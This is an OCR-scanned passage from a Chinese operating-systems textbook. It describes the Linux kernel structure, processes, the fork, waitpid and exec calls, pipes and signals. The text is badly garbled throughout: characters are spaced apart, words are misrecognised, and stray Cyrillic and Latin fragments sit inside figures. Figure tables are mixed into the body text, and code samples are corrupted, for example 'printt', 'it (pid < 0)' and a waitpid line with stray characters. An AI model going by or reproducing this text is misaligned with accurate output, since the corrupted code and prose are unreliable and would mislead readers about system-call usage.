网 络 通用 块 层 
协议 


页 面 林 换 


网 络 设备 


页 面 缓存 


= са 


图 10-3 Linux 内 核 结构 


接 下 来 ， 我 们 将 内 核子 系统 分 为 三 个 主要 部 件 。 在 图 10-3 中 IO 部 件 包含 所 有 负责 与 设备 交互 以 及 
实现 联网 和 存储 的 MO 功 能 的 内 核 部 件 。 在 最 高 层 ， 这 些 IO 功能 全 部 整合 在 一 个 虚拟 文件 系统 层 中 。 也 
就 是 说 ， 从 顶层 来 看 ， 对 一 个 文件 进行 读 拘 作 ， 不 论 是 在 内 存 还 是 磁盘 中 ， 都 和 从 终端 输入 中 读 取 一 个 
字符 是 一 样 的 。 从 底层 来 看 ， 所 有 的 IO 操作 都 要 通过 某 一 个 设备 驱动 器 。 所 有 的 Linux 驱 动 程序 都 可 以 
被 分 类 为 字符 驱动 程序 或 块 驱动 程序 ， 两 者 之 间 的 主要 区 别 是 块 设备 允许 查找 和 随机 访问 而 字符 设备 不 
允许 。 从 技术 上 讲 ， 网 络 设备 实际 上 是 字符 设备 ， 不 过 它们 的 处 理 和 其 他 字符 设备 不 太 -- 样 ， 因 此 为 了 
清晰 起 见 将 它们 单独 分 类 ， 如 图 10-3 所 示 。 

在 设备 驱动 程序 之 上 ， 每 个 设备 类 型 的 内 核 代 码 都 不 一 样 。 字 符 设备 有 两 种 不 同 的 使 用 方式 。 有 些 
程序 ， 如 可 视 编辑 器 Vi，emacs 等 ， 需 要 每 一 个 键盘 输入 。 原 始 的 终端 (пу) 1/0 可 以 实现 这 种 功能 。 共 
他 程序 ， 比 如 shell 等 ， 是 面向 行 的 ， 因 此 允许 用 户 在 输入 回 车 并 将 字符 申 发 送 给 程序 之 前 整 行 地 进行 编 
辑 。 在 这 种 情况 下 ， 由 终端 流出 的 字符 流 需 要 通过 一 个 所 谓 的 行规 则 ， 其 中 的 内 容 被 相应 地 格式 化 。 

网 络 软件 通常 是 模块 化 的 ， 由 不 同 的 设备 和 协议 来 支持 。 网 络 设备 的 上 一 个 层次 负责 一 种 常规 程序 ， 
确保 每 一 个 包 被 送 到 正确 的 设备 或 协议 处 理 器 。 大 多 数 Linux 系 统 在 内 核 中 包含 一 个 完整 的 硬件 路 由 器 
的 功能 ， 尽 管 其 性 能 比 硬件 路 由 器 的 性 能 差 一 些 。 在 路 由 器 代码 之 上 的 是 实际 的 协议 栈 ， 它 总 是 包含 IP 
和 TCP 协 议 ， 也 包含 一 些 其 他 协议 。 在 整个 网 络 之 上 的 是 socket 接 口 ， 它 允许 程序 来 为 特定 的 网 络 和 协 
议 创建 socket， 并 为 每 一 个 socket 返 回 一 个 待 用 的 文件 描述 符 。 

在 磁盘 驱动 器 之 上 是 1/O 调 度 器 ， 它 负责 排序 和 分 配 磁盘 读 写 操作 ， 以 尽 可 能 减少 磁头 的 无 用 移动 
或 者 满足 一 些 其 他 的 系统 原则 为 方法 。 

块 设备 列 的 最 顶层 是 文件 系统 。Linux 允 许 ， 也 确实 有 多 个 文件 系统 同时 存在 。 为 了 向 文件 系统 的 实 
现 隐藏 不 同 硬件 设备 体系 之 间 的 区 别 ， 一 个 通用 的 块 设备 层 提供 了 一 个 可 以 被 所 有 文件 系统 使 用 的 抽象 。 

图 10-3 的 右边 是 Linux 内 核 的 另外 两 个 重要 组 成 部 件 ， 它 们 负责 存储 和 进程 管理 任务 。 存储 管理 任 
务 包括 维护 虚拟 内 存 到 物理 内 存 的 映射 ， 维护 最 近 被 访问 页 面 的 缓存 以 及 实现 一 个 好 的 页 面 置换 算法 ， 
并 且 根据 需要 把 需要 的 数据 和 代码 页 读 入 内 存 中 。 

进程 管理 部 件 的 最 主要 任务 是 进程 的 创建 和 终止 。 它 还 包括 一 个 进程 调度 器 ， 负 责 选 择 下 一 步 运 行 
哪个 进程 或 线程 。 我 们 将 在 下 一 节 看 到 ， Linux 把 进程 和 线程 简单 地 看 作 可 运行 的 实体 ， 并 使 用 统一 的 
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调度 策略 对 它们 进行 调度 。 最 后 ， 信 号 处 理 的 代码 也 属于 进程 管理 部 件 。 

尽管 这 三 个 部 件 在 图 中 被 分 开 , 实际 上 它们 高 度 相互 依赖 。 文件 系 统一 般 通过 块 设备 进行 文件 访问 。 
然而 ， 为 了 隐藏 磁盘 读 取 的 严重 延迟 ， 文 件 被 复制 到 内 存 中 的 页 缓存 中。 有 些 文件 甚至 可 能 是 动态 创建 
的 并 且 只 在 内 存 中 存在 ， 比 如 提供 运行 时 资源 使 用 情况 的 文件 。 另 外 ， 当 需要 清空 一 些 页 时 ， 虚 拟 存储 
系统 可 能 依靠 一 个 磁盘 分 区 或 者 文件 内 的 交换 区 来 备份 内 存 的 一 部 分 ， 因 此 依赖 于 1O 部 件 。 当 然 ， 还 
存在 着 很 多 其 他 的 组 件 之 间 的 相互 依赖 。 

除了 内 核 内 的 静态 部 件 外 ，Linux 支 持 动态 可 装载 模块 。 这 些 模块 可 以 用 来 补充 或 者 赫 换 缺 省 的 设 
备 驱 动 程序 、 文 件 系统 、 网 络 或 者 其 他 内 核 代 码 。 在 图 10-3 中 没有 显示 这 些 模块 。 

最 后 ， 处 在 最 顶层 的 是 到 内 核 的 系统 调用 接口 。 所 有 系统 调用 都 来 自 这 里 ， 其 导致 一 个 陷阱 ， 并 将 
系统 从 用 户 态 转换 到 受 保护 的 内 核 态 ， 继 而 将 控制 权 交 给 上 述 的 内 核 部 件 之 一 。 


10.3 Linux 中 的 进程 

前 面 的 几 个 小 节 是 从 键盘 的 角度 来 看 待 Linux， 也 就 是 说 以 用 户 在 xterm 窗 口中 所 见 的 内 容 来 看 待 
Linux。 我 们 给 出 了 常用 的 shell 命 令 和 标准 应 用 程序 作为 例子 。 最 后 ， 以 一 个 对 Linux 系统 结构 的 简要 概 
括 作为 结尾 。 现 在 ， 让 我 们 深入 到 系统 内 核 ， 更 仔细 地 研究 Linux 系 统 所 支持 的 基本 概念 ， 即 进程 、 内 
存 、 文 件 系统 和 输入 /输出 。 这 些 概念 非常 重要 ， 因 为 系统 调用 (到 操作 系统 的 接口 ) 将 对 这 些 概念 进 
行 操作 。 举 个 例子 来 说 ，Linux 系 统 中 存在 着 用 来 创建 进程 和 线程 、 分 配 内 存 、 打 开 文件 以 及 进行 输入 / 
输出 操作 的 系统 调用 。 

遗憾 的 是 ， 由 于 Linux 系 统 的 版 本 非常 之 多 ， 各 个 版 本 之 间 均 有 不 同 。 在 这 一 章 里 ， 我 们 将 氛 弃 着 
眼 于 某 一 个 Linux 版 本 的 方法 ， 转 而 强调 各 个 版 本 的 共通 之 处 。 因 此 ， 在 某 些小 节 中 (特别 是 涉及 实现 
方法 的 小 节 )， 这 里 讨论 的 内 容 不 一 定 同样 适用 于 每 个 Linux 版 本 。 
10.3.1 基本 概念 

Linux 系 统 中 主要 的 活动 实体 就 是 进程 。Linux 进 程 与 我 们 在 第 2 章 所 学 的 经 典 顺序 进程 极为 相似 。 
每 个 进程 执行 一 段 独立 的 程序 并 且 在 进程 初始 化 的 时 候 拥有 一 个 独立 的 控制 线程 。 换 句 话说 ， 每 一 个 进 
程 都 拥有 一 个 独立 的 程序 计数 器 ， 用 这 个 程序 计数 器 可 以 追踪 下 一 条 将 要 被 执行 的 指令 。 一 旦 进程 开始 
运行 ，Linux 系 统 将 允许 它 创建 额外 的 线程 。 

由 于 Linux 是 一 个 多 道 程序 设计 系统 ， 因 此 系统 中 可 能 会 有 多 个 彼此 之 间 相 互 独立 的 进程 在 同时 运 
行 。 而 且 ， 每 一 个 用 户 可 以 同时 开启 多 个 进程 。 因 此 ， 在 一 个 庞大 的 系统 里 ， 可 能 有 成 百 个 甚至 上 千 个 
进程 在 同时 运行 。 事 实 上 ， 在 大 多 数 单 用 户 的 工作 站 里 ， 即 使 用 户 已 经 退出 登录 ， 仍 然 会 有 很 多 后 台 进 
程 ， 即 守护 进程 (daemon)， 在 运行 。 在 系统 启动 的 时 候 ， 这 些 守护 进程 就 已 经 被 shell 脚 本 开启 (在 英 
语 中 ,“daemon” 是 “demon” 的 另 一 种 拼写 ， 而 demon 是 指 一 个 恶魔 ) 。 

计划 任务 (cron daemon) 是 一 个 典型 的 守护 进程 。 它 每 分 钟 运行 一 次 来 检查 是 否 有 工作 需要 它 完 
成 。 如 果 有 工作 要 做 ， 它 就 会 将 之 完成 ， 然 后 进入 休眠 状态 ， 直 到 下 一 次 检查 时 刻 来 到 。 

在 Linux 系 统 中 ， 你 可 以 把 在 未 来 几 分 钟 、 几 个 小 时 、 凡 天 甚至 几 个 月 会 发 生 的 事件 列 成 时 间 表 ， 
所 以 这 个 守护 进程 是 非常 必要 的 。 举 个 例子 来 说 ， 假 定 一 个 用 户 在 下 周二 的 三 点 钟 要 去 看 牙医 ， 那么 他 
就 可 以 在 计划 任务 的 数据 库 里 添加 一 条 记录 ， 让 计划 任务 来 提醒 他 ， 比 如 说 ,在 两 点 半 的 时 候 。 接 下 来 ， 
当 相应 的 时 间 到 来 的 时 候 ， 计 划 任 务 意识 到 有 工作 需要 它 来 完成 ， 就 会 运行 起 来 并 且 开启 一 个 新 的 进程 
来 执行 提醒 程序 。 

计划 任务 也 可 以 执行 一 些 周期 性 的 活动 ， 比 如 说 在 每 天 凌晨 四 点 的 时 候 进行 磁盘 备份 ， 或 者 是 提醒 
健忘 的 用 户 每 年 10 月 31 号 的 时 候 需要 为 万 圣 节 储备 一 些 好 吃 的 糖果 。 当 然 ， 系统 中 还 存在 其 他 的 守护 进 
程 ， 他 们 接收 或 发 送 电子 邮件 、 管 理 打印 队列 、 检 测 内 存 中 是 否 有 足够 的 空闲 页 等 。 在 Linux 系 统 中 ， 
守护 进程 可 以 直接 实现 ， 因 为 它 不 过 是 与 其 他 进程 无 关 的 另 一 个 独立 的 进程 而 已 。 

在 Linux 系 统 中 ， 进 程 通过 非常 简单 的 方式 创建 。 系统 调用 fork 将 会 创建 一 个 与 原始 进程 完全 相同 
的 进程 副本 。 调 用 fork 函 数 的 进程 称 为 父 进程 ， 新 的 进程 称 为 子 进程 。 父 进程 和 子 进程 都 拥有 自己 的 私 
有 内 存 映像 。 如 果 在 调用 fork 函 数 之 后 ， 父 进程 修改 了 属于 它 的 一 些 变量 ， 这 些 变化 对 于 子 进 程 来 说 是 
不 可 见 的 ， 反 之 亦 然 。 
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但 是 ， 父 进程 和 子 进程 可 以 共享 已 经 打开 的 文件 。 也 就 是 说 ， 如 果 某 一 个 文件 在 父 进程 调用 fork 函 
数 之 前 就 已 经 打开 了 ， 那 么 在 父 进 程 调用 fork 函 数 之 后 ， 对 于 父 进程 和 子 进程 来 说 ， 这 个 文件 也 是 打开 
的 。 如 果 父 、 子 进程 中 任何 一 个 进程 对 这 个 文件 进行 了 修改 ， 那 么 对 于 另 一 个 进程 而 言 ， 这 些 修改 都 是 
可 见 的 。 由 于 这 些 修改 对 于 那些 打开 了 这 个 文件 的 其 他 任何 无 关 进程 来 说 也 是 可 见 的 ， 所 以 ， 在 父 、 子 
进程 间 共 享 已 经 打开 的 文件 以 及 对 文件 的 修改 彼此 可 见 的 做 法 也 是 很 正常 的 。 

事实 上 ， 父 、 子 进程 的 内 存 映 像 、 变 量 、 寄 存 器 以 及 其 他 所 有 的 东西 都 是 相同 的 ， 这 就 产生 了 一 个 
问题 : 该 如 何 区 别 这 两 个 进程 ， 即 哪 一 个 进程 该 去 执行 父 进程 的 代码 ， 哪 一 个 进程 该 去 执行 子 进程 的 代 


码 呢 ? 秘密 在 于 fork 系 统 调用 给 子 进程 pid юқ: /* 如 果 创建 成 功 ， 则 父 进 程 pid>0*/ 
返回 一 个 零 值 ， 而 给 父 进 程 返回 一 个 | а) аруа 
非 零 值 。 这 个 非 零 值 是 子 进程 的 进程 。 | gigdo orori): "ИША (Нотта аан) 
标识 符 (Process Identifier, PID), 两 + 这 里 是 父 进程 的 代码 */ 


个 进程 检验 fork 函 数 的 返回 值 ， 并 且 根 。 | }elsef 
据 返回 值 继续 执行 ， 如 图 10-4 所 示 。 ) 

р 以 其 PID: ° Ж, 
Е тенини 图 104 Linux 中 的 进程 创建 
程 会 得 到 它 的 PID。 如 果子 进程 希望 知道 它 自己 的 PID， 可 以 调用 系统 调用 getpid。PID 有 很 多 用 处 ， 举 
个 例子 来 说 ， 当 一 个 子 进程 结束 的 时 候 ， 它 的 父 进程 会 得 到 该 子 进程 的 PID。 这 一 点 非常 重要 ， 因 为 一 
个 父 进程 可 能 会 有 多 个 子 进 程 。 由 王子 进程 还 可 以 生成 子 进程 ， 那 么 一 个 原始 进程 可 以 生成 一 个 进程 树 ， 
其 中 包含 着 子 进 程 、 孙 子 进程 以 及 关系 更 疏远 的 后 裔 进程。 

Linux 系 统 中 的 进程 可 以 通过 一 种 消息 传递 的 方式 进行 通信 。 在 两 个 进程 之 间 ， 可 以 建立 一 个 通道 ， 
一 个 进程 向 这 个 通道 里 写 入 字 节 流 ， 另 一 个 进程 从 这 个 通道 中 读 取 字 节 流 。 这 些 通道 称 为 管道 (pipe)。 
使 用 管道 也 可 以 实现 同步 ， 因 为 如 果 一 个 进程 试图 从 一 个 空 的 管道 中 读 取 数据 ， 这 个 进程 就 会 被 挂 起 直 
到 管道 中 有 可 用 的 数据 为 止 。 

shell 中 的 管线 就 是 用 管道 技术 实现 的 。 当 shell 看 到 类 似 下 面 的 一 行 输入 时 ， 

sort <f | head 


它 会 创建 两 个 进程 ， 分 别 是 sort 和 head， 同 时 在 两 个 进程 间 建 立 一 个 管道 使 得 sort 进 程 的 标准 输出 作为 
head 进 程 的 标准 输入 。 这 样 一 来 ，sort 进 程 产生 的 输出 可 以 直接 作为 head 进 程 的 输入 而 不 必 写 入 到 一 个 
文件 当中 去 。 如 果 管道 满 了 ， 系 统 会 停止 运行 ort 进程 直到 head 进 程 从 管道 中 删除 一 些 数据 
进程 还 可 以 通过 另 一 种 方式 通信 : 软件 中 断 。 一 个 进程 可 以 给 另 一 个 进程 发 送信 号 (signal) 。 进 程 
可 以 告诉 操作 系统 当 信号 到 来 时 它们 希望 发 生 什 么 事件 。 相 关 的 选择 有 忽略 这 个 信号 、 抓 取 这 个 信号 或 
者 利用 这 个 信号 杀 死 某 个 进程 (大 部 分 情况 下 ， 这 是 处 理 信号 的 默认 方式 )。 如 果 一 个 进程 希望 获取 所 
有 发 送 给 它 的 信号 ， 它 就 必须 指定 一 个 信号 处 理 函 数 。 当 信号 到 达 时 ， 控 制 立 即 切换 到 信号 处 理 函数 。 
当 信 号 处 理 函数 结束 并 返回 之 后 ,控制 га 原画 
像 硬件 1/O 中 断 一 样 返 回 到 陷 人 点 处 。 一 SIGABRT ариев н 
个 进程 只 可 以 给 它 所 在 进程 组 中 的 其 他 。 | SIGALRM| 警报 时 证 超时 Е 
进程 发 送信 号 ， 这 个 进程 组 包括 它 的 父 。 |SIGFPE | 出 现 浮 点 错误 比如 ， 除 0) 
进程 (以 及 远 祖 进程) 、 兄 弟 进 程 和 子 进 | SIGHUP | 进程 所 使 用 的 电话 线 被 入 断 
згр 69 À SIGILL 用 户 按 了 DEL Е 
R (RERE). аю, -ARET зоот ялгы A 一 | 
以 利用 系统 调用 给 它 所 在 的 进程 组 中 所 。 [SIGKILL | ARER ава — 
有 的 成 员 发 送信 号 。 | SIGPIPE | 进程 写 人 了 无 读者 的 管道 。 
信和 号 还 可 以 用 于 其 他 用 途 。 比 如 说 ， [SIGSEGV] 进程 引用 了 非法 的 内 存 地 证 
如 果 一 个 进程 正在 进行 浮 点 运算 ， 但 是 。 |SIGTERM| 用 于 要 求 进程 正常 终止 ч 
不 慎 除数 为 0， 它 就 会 得 到 一 个 SIGFPE SIGUSRI | 用 于 应 用 程序 定义 的 目的 кы эё 
信和 号 GPMS). роля COURET Мали 
定义 的 信号 详 见 图 10-5 所 示 。 很 多 Linux 图 10-5 POSIX 定 义 的 信和 号 


让 这 里 是 子 进程 的 代码 */ 
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系统 会 有 自己 添加 的 额外 信号 ,但 是 使 用 了 这 些 信号 的 程序 一 般 情况 下 将 没有 办 法 移植 到 Linux 的 其 他 
版 本 或 者 UNIX 系 统 上 。 
10.3.2 Linux 中 进程 管理 相关 的 系统 调用 

现在 来 关注 一 下 Linux 系 统 中 与 进程 管理 相关 的 系统 调用 。 主 要 的 系统 调用 如 图 10-6 所 示 。 为 了 开 
始 我 们 的 讨论 ,fork 函 数 是 一 个 很 好 的 切入 点 。fork 系 统 调用 是 Linux 系 统 中 创建 一 个 新 进程 的 主要 方式 ， 
同时 也 被 其 他 传统 的 UNIX 系 统 所 支持 (在 下 一 部 分 将 讨论 另 一 种 创建 进程 的 方法 )。fork 函 数 创建 一 个 
与 原始 进程 完全 相同 的 进程 副本 ， 包 括 相 同 的 文件 描述 符 、 相 同 的 寄存 器 内 容 和 其 他 的 所 有 东西 。fork 
函数 调用 之 后 ， 原 始 进程 和 它 的 副本 ( 即 父 进程 和 子 进程 ) 各 循 其 路 。 虽 然 在 fork 函 数 刚刚 结束 调用 的 
时 候 ， 父 、 子 进程 所 拥有 的 全 部 变量 都 具有 相同 的 变量 值 ， 但 是 由 于 父 进程 的 全 部 地 址 空间 已 经 被 子 进 
程 完全 复制 ， 父 、 子 进程 中 的 任何 一 个 对 内 存 的 后 续 操 作 所 引起 的 变化 将 不 会 影响 另外 一 个 进程 。fork 
函数 的 返回 值 ， 对 于 子 进程 来 说 ， 恒 为 0， 对 于 父 进程 来 说 ， 是 它 所 生成 的 子 进程 的 PID 。 使 用 返回 的 
PID， 可 以 区 分 哪 一 个 进程 是 父 进程 ， 哪 一 个 进程 是 子 进程 。 

在 大 多 数 情况 下 ， 调 用 fork 函 数 之 后 ， 子 进程 需要 执行 不 同 于 父 进 程 的 代码 。 以 shell 为 例 。 它 从 终 
端 读 取 一 行 命令 ， 调 用 fork 函 数 生成 一 个 子 进程 ， 然 后 等 待 子 进程 来 执行 这 个 命令 ， 子 进程 结束 之 后 继 
续 读 取 下 一 条 命令 。 在 等 待 子 进程 结束 的 过 程 中 ， 父 进程 调用 系统 调用 waitpid， 一 直 等 待 直 到 子 进程 结 
东 运 行 《如 果 该 父 进程 不 止 拥有 一 个 子 进程 ， 那 么 要 一 直 等 待 直到 所 有 的 子 进程 全 部 结束 运行 ) 。 
waitpid 系 统 调用 有 三 个 参数 。 设 置 第 一 个 参数 可 以 使 调用 者 等 待 某 一 个 特定 的 子 进程 。 如 果 第 一 个 参数 
为 -1， 任 何 一 个 子 进程 结束 系统 调用 waitpid 即 可 返回 (比如 说 ， 第 一 个 子 进程 )。 第 二 个 参数 是 一 个 用 
来 存储 子 进程 退出 状态 〈 正 常 退出 、 异 常 退出 和 退出 值 ) 的 变量 地 址 。 第 三 个 参数 决定 了 如 果 没 有 子 进 
程 结束 运行 的 话 ， 调 用 者 是 阻塞 还 是 返回 。 

仍然 以 shell 为 例 , 子 进程 必须 执行 用 户 键入 的 命令 。 子 进程 通过 调用 系统 调用 exec 来 执行 用 户 命令 ， 
以 exec 函 数 的 第 一 个 参数 命名 的 文件 将 会 替换 掉 子 进程 原来 的 全 部 核心 映像 。 图 10-7 展 示 了 一 个 高 度 简 
化 的 shell (有 助 于 理解 系统 调用 fork，waitpid 和 exec 的 用 法 )。 

系统 调用 | Сй ж 
pid=fork () 
pla=waitpid (рїй,&зїайос,ор1в) 
в=ехесуе (пате,агду,епур) 
!ехї (status) 


终止 进程 运行 并 返回 状态 值 


|s=sigaction (sig,&act,&oldact) | Ж Жа ЖЕБЕЙ ЗЕ 

s=sigreturn (&context) | 从 信和 号 返回 = 
|s=sigprocmask (how,&set,&old)| 检查 或 更 换 信和 号 掩 码 

s=sigpending (set) 获得 阻塞 信号 集合 

ls=sigsuspend (sigmask) | 蔡 换 信号 掩 码 或 挂 起 进程 

5=КЇЇ {pid,sig) 发 送信 号 到 进程 

residual=alarm (seconds) ШЕННЕ 

з=раџѕе (у 挂 起 调用 程序 直到 下 一 个 信号 出 现 


图 10-6 一 些 与 进程 相关 的 系统 调用 。 如 果 发 生 错误 ， 则 返回 值 s 是 1，pid 指 进程 
ID，residual 指 前 一 个 警报 的 剩余 时 间 。 参 数 的 含义 由 其 名 字 指出 


在 大 多 数 情况 下 ，exec 函 数 有 三 个 参数 ， 待 执行 文件 的 文件 名 ， 指 向 参数 数组 的 指针 和 指向 环境 
数组 的 指针 。 简 单 介绍 一 下 其 他 的 类 似 函 数 。 很 多 库 函 数 ， 如 execl、 execv、 execle 和 execve， 允 许 省 
略 参数 或 者 用 不 同 的 方式 来 指定 参数 。 上 述 的 所 有 库 函 数 都 会 调用 相同 的 底 月 系统 调用 。 尽 管 系统 调用 
是 exec 函 数 ， 但 是 函数 库 中 却 没有 同名 的 库 函数 ， 所 以 只 能 使 用 上 面 提 到 的 其 他 函数 。 

考虑 在 shell 中 输入 如 下 命令 ; 

cp file1 file2 


用 来 建立 一 个 名 为 file2 的 filel 的 副本 。 在 shell 调 用 fork 函 数 之 后 ， 子 进程 定位 并 执行 文件 名 为 cp 的 可 执 
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行文 件 同时 把 需要 复制 的 文件 信息 传递 给 它 。 

cp 的 主 程序 (还 有 很 多 其 他 的 程序 ) 包含 一 个 函数 声明 : 

main(argc, argv, envp) 
在 这 里 ， 参 数 argc 表 示 命 令 行 中 包括 程序 名 的 项 的 数目 。 在 上 面 所 举 的 例子 中 ，argc 的 值 为 3。 

第 二 个 参数 argv 是 一 个 指向 数组 的 指针 。 数 组 的 第 i 项 是 一 个 指向 命令 行 中 第 个 字符 串 的 指针 。 在 
此 例 中 ，argv[0] 指 向 字符 串 “cp"。 以 此 类 推 ，argv[1] 指 向 五 字 节 长 度 的 字符 串 “filel"，argv[2] 指 向 五 
字 节 长 度 的 字符 串 “file2"。 

main 的 第 三 个 参数 envp 是 一 个 指向 环境 的 指针 ， 这 里 的 环境 ， 是 指 一 个 包含 若干 个 形 如 name = 
value 赋 值 语句 的 字符 串 数组 ， 这 个 数组 将 传递 终端 类 型 、 主 目录 名 等 信息 给 程序 。 在 图 10-7 中 ， 没 有 要 
传 给 子 进 程 的 环境 列表 ， 所 以 在 这 里 ，execve 函 数 的 第 三 个 参数 是 0。 


while (TRUE) { NERA” _ 
type-prompt( ): 人 "在 屏幕 上 显示 提示 符 */ 
read-command(command, params);，/* 从 键盘 读 取 输 入 行 */ 
pid = fork( ); 六 创建 子 进程 ?/ 
it (pid < 0) { 
printt("Unable to fork 0"); 个 错误 状态 */ 
continue; /重复 循环 */ 
} 
if (pid != 0) { 
waitpid (-1, &status, 0); PUERTA 
Jelse { 
execve(command, params, 0); 。 /* 子 进程 执行 操作 */ 


图 10-7 一 个 高 度 简化 的 shell 


如 果 exec 函 数 看 起 来 太 复杂 了 ， 不 要 泄气 ， 这 已 经 是 最 复杂 的 系统 调用 了 ， 剩 下 的 要 简单 很 多 。 
作为 一 个 简单 的 例子 ， 我 们 来 考虑 exit 函 数 ， 当 进程 结束 运行 时 会 调用 这 个 函数 。 它 有 一 个 参数 ， 即 退 
出 状态 〈 从 0 到 255) ， 这 个 参数 的 值 最 后 会 传递 给 父 进程 调用 waitpid 函 数 的 第 二 个 参数 一 “状态 参数 。 
状态 参数 的 低 字 节 部 分 包含 着 结束 状态 ，0 意 味 着 正常 结束 ， 其 他 的 值 代表 各 种 不 同 的 错误 。 状态 参数 
的 高 字 节 部 分 包含 着 子 进 程 的 退出 状态 〈 从 0 到 255) ， 其 值 由 子 进 程 调用 的 exit 系 统 调用 指定 。 例如 ， 如 
果 父 进程 执行 如 下 语句 : 

п = waitpid(—1, &status, 0); 

它 将 一 直 处 于 挂 起 状态 ， 直 到 有 子 进 程 结束 运行 。 如 果子 进程 退出 时 以 4 作为 exit 函 数 的 参数 ， 父 进程 将 
会 被 唤醒 ， 同 时 将 变量 "设置 为 子 进 程 的 PID ， 变 量 starus 设 置 为 0x0400 (在 C 语 言 中 ， 以 0x 作 为 前 组 表 
示 十 六 进 制 )。 变 量 status 的 低 字 节 与 信和 号 有 关 ， 高 字 节 是 子 进程 返回 时 调用 exit 函 数 的 参数 值 。 

如 果 一 个 进程 退出 但 是 它 的 父 进程 并 没有 在 等 待 它 ， 这 个 进程 进入 售 死 状态 (zombie state) 。 最 后 
当 父 进程 等 待 它 时 ， 这 个 进程 才 会 结束 。 

一 些 与 信号 相关 的 系统 调用 以 各 种 各 样 的 方式 被 运用 。 比 方 说 ， 如 果 一 个 用 户 偶然 间 命令 文字 编辑 
器 显示 一 篇 超 长 文档 的 全 部 内 容 ， 然 后 意识 到 这 是 一 个 误 操 作 ， 这 就 需要 采用 某 些 方法 来 打 断 文字 编辑 
器 的 工作 。 对 于 用 户 来 说 ， 最 常用 的 选择 是 敲 击 某 些 特定 的 键 (如 DEL 或 者 CTRL-C 等 ) ， 从 而 给 文字 纺 
辑 器 发 送 一 个 信号 。 文 字 编 辑 器 捕捉 到 这 个 信号 ， 然 后 停止 显示 。 

为 了 表明 所 关心 的 信号 有 哪些 ， 进 程 可 以 调用 系统 调用 sigaction。 这 个 函数 的 第 一 个 参数 是 希望 捕 
捉 的 信号 (如 图 10-5 所 示 )。 第 二 个 参数 是 一 个 指向 结构 的 指针 ， 在 这 个 结构 中 包括 一 个 指向 信号 处 理 
函数 的 指针 以 及 一 些 其 他 的 位 和 标志 。 第 三 个 参数 也 是 一 个 指向 结构 的 指针 ， 这 个 结构 接收 系统 返回 的 
当前 正在 进行 的 信号 处 理 的 相关 信息 ， 有 可 能 以 后 这 些 信息 需要 恢复 。 

信号 处 理 函数 可 以 运行 任意 长 的 时 间 。 尽 管 如 此 ， 在 实践 当中 ， 通常 情况 下 信号 处 理 函 数 都 非常 短 
小 精 悍 。 当 信号 处 理 完毕 之 后 ， 控 制 返回 到 断 点 处 继续 执行 。 
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sigaction 系 统 调用 也 可 以 用 来 忽略 一 个 信号 ， 或 者 恢复 为 一 个 杀 死 进程 的 缺 省 操作 。 

训 击 DEL 键 并 不 是 发 送信 号 的 惟一 方式 。 系 统 调用 kill 允 许 一 个 进程 给 它 相 关 的 进程 发 送信 号 。 选 
择 “kill” 作 为 这 个 系统 调用 的 名 字 其 实 并 不 是 十 分 贴切 ， 因 为 大 多 数 进程 发 送信 号 给 别 的 进程 只 是 为 
了 信号 能 够 被 捕 所 到 。 

对 于 很 多 实时 应 用 程序 ， 在 一 段 特定 的 时 间 间 隔 之 后 ， 一 个 进程 必须 被 打 断 ， 系 统 会 转 去 做 一 些 其 
他 的 事情 ， 比 如 说 在 一 个 不 可 信 的 信道 上 重新 发 送 一 个 可 能 丢失 的 数据 包 。 为 了 处 理 这 种 情况 ， 系 统 提 
供 了 alarm 系 统 调用 。 这 个 系统 调用 的 参数 规定 了 一 个 以 秒 为 单位 的 时 间 间 隔 ， 这 个 时 间 间隔 过 后 ， 一 
个 名 为 SIGALRM 的 信号 会 被 发 送 给 进程 。 一 个 进程 在 某 一 个 特定 的 时 刻 只 能 有 惟一 一 个 未 处 理 的 警报 。 
如 果 alarm 系 统 调用 首先 以 10 秒 为 参数 被 调用 ，3 秒 钟 之 后 ， 又 以 20 秒 为 参数 被 调用 ， 那 么 只 会 生成 一 个 
SIGALRM 信 号 ， 这 个 信号 生成 在 第 二 次 调用 alarm 系 统 调用 的 20 秒 之 后 。 第 一 次 alarm 系 统 调用 设置 的 
信号 被 第 二 次 alarm 系 统 调用 取消 了 。 如 果 alarm 系 统 调用 的 参数 为 0， 任 何 即 将 发 生 的 警报 信号 都 会 被 
取消 。 如 果 没 有 捕捉 到 警报 信号 ， 将 会 采取 默认 的 处 理 方式 ， 收 取信 号 的 进程 将 会 被 杀 死 。 从 技术 角度 
来 讲 ， 警 报信 号 是 可 以 忽略 的 ， 但 是 这 样 做 毫 无 意义 。 

有 些 时 候 会 发 生 这 样 的 情况 ， 在 信号 到 来 之 前 ， 进 程 无 事 可 做 。 比 如 说 ， 考 虑 一 个 用 来 测试 阅读 速 
度 和 理解 能 力 的 计算 机 辅助 教学 程序 。 它 在 屏幕 上 显示 一 些 文本 然后 调用 alarm 函 数 于 30 秒 后 生成 一 个 
警报 信号 。 当 学 生 读 课文 的 时 候 ， 程 序 就 无 事 可 做 。 它 可 以 进入 空 循环 而 不 做 任何 事情 ， 但 是 这 样 一 来 
就 会 浪费 其 他 后 台 程序 或 用 户 急需 的 CPU 时 间 。 一 个 更 好 的 解决 办 法 就 是 使 有 pause 系统 调用 ， 它 会 j 
知 Linux 系 统 将 本 进程 挂 起 直到 下 一 个 信号 到 来 。 


10.3.3 Linux 中 进程 与 线程 的 实现 

Linux 系 统 中 的 一 个 进程 就 像 是 一 座 水 山 ， 你 所 看 见 的 不 过 是 它 露出 水 面 的 部 分 ， 而 很 重要 的 一 部 
分 隐藏 在 水 下 。 每 一 个 进程 都 有 一 个 运行 用 户 程序 的 用 户 模式 。 但 是 当 它 的 某 一 个 线程 调用 系统 调用 之 
后 ， 进 程 会 陷入 内 核 模式 并 且 运 行 在 内 核 上 下 文中 ， 它 将 使 用 不 同 的 内 存 映射 并 且 拥有 对 所 有 机 器 资源 
的 访问 权 。 它 还 是 同一 个 线程 ， 但 是 现在 拥有 更 高 的 权限 ， 同时 拥有 自己 的 内 核 堆栈 以 及 内 核 程序 计数 
器 。 这 几 点 非常 重要 ， 因 为 一 个 系统 调用 可 能 会 因为 某 些 原因 陷入 阻塞 态 ， 比 如 说 ， 等 待 一 个 磁盘 操作 
的 完成 。 这 时 程序 计数 器 和 寄存 器 内 容 会 被 保存 下 来 使 得 不 久之 后 线程 可 以 在 内 核 模式 下 继续 运行 。 

在 Linux 系 统 内 核 中 ， 进 程 通过 数据 结构 task_struet 被 表示 成 任务 (task)。 不 像 其 他 的 操作 系统 会 区 
